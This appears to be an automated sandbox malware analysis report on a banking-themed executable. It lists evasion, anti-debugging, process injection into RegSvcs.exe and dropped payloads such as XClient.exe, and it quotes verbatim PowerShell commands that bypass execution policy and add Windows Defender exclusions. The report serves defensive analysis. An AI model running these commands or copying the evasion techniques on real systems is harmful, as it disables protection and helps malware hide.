Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

API coverage: 5.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\alg.exe TID: 1624	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\alg.exe TID: 2348	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe TID: 7192	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7284	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\differences\niellist.exe TID: 7792	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 6573 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 3193 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1084	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 2644	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 5784	Thread sleep count: 56 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\alg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\build.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Windows\System32\alg.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: XClient.exe, 0000000B.00000002.2554544345.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: niellist.exe, 00000011.00000002.1410876293.0000000000A67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH_
Source: wscript.exe, 00000010.00000002.1385129268.00000206917A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1307290100.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322162088.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772258009.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987104410.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1279607006.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1558654635.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1301817697.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000010.00000002.1385129268.00000206917A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi
Source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process information queried: ProcessInformation

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

0_2_00435A7C

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_005A8594 mov eax, dword ptr fs:[00000030h]	0_2_005A8594
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD1130 mov eax, dword ptr fs:[00000030h]	0_2_00AD1130
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B13F3D mov eax, dword ptr fs:[00000030h]	0_2_00B13F3D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D711F0 mov eax, dword ptr fs:[00000030h]	0_2_00D711F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D71250 mov eax, dword ptr fs:[00000030h]	0_2_00D71250
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D6FB80 mov eax, dword ptr fs:[00000030h]	0_2_00D6FB80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA1130 mov eax, dword ptr fs:[00000030h]	3_2_00AA1130
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE3F3D mov eax, dword ptr fs:[00000030h]	3_2_00AE3F3D
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA2A0 mov eax, dword ptr fs:[00000030h]	3_2_00CEA2A0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA300 mov eax, dword ptr fs:[00000030h]	3_2_00CEA300
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CE8C30 mov eax, dword ptr fs:[00000030h]	3_2_00CE8C30
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFAE88 mov eax, dword ptr fs:[00000030h]	17_2_00AFAE88
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC4F8 mov eax, dword ptr fs:[00000030h]	17_2_00AFC4F8
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC558 mov eax, dword ptr fs:[00000030h]	17_2_00AFC558
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C1130 mov eax, dword ptr fs:[00000030h]	17_2_033C1130
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03403F3D mov eax, dword ptr fs:[00000030h]	17_2_03403F3D

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A155
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,	0_2_0042A124
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B11361
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B14C7B
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00AE1361
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00AE4C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03401361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_03401361
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03404C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_03404C7B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 941008			Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FC6008

Contains functionality to execute programs as a different user

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Contains functionality to simulate keystroke presses

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

0_2_004048D7

Contains functionality to simulate mouse events

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
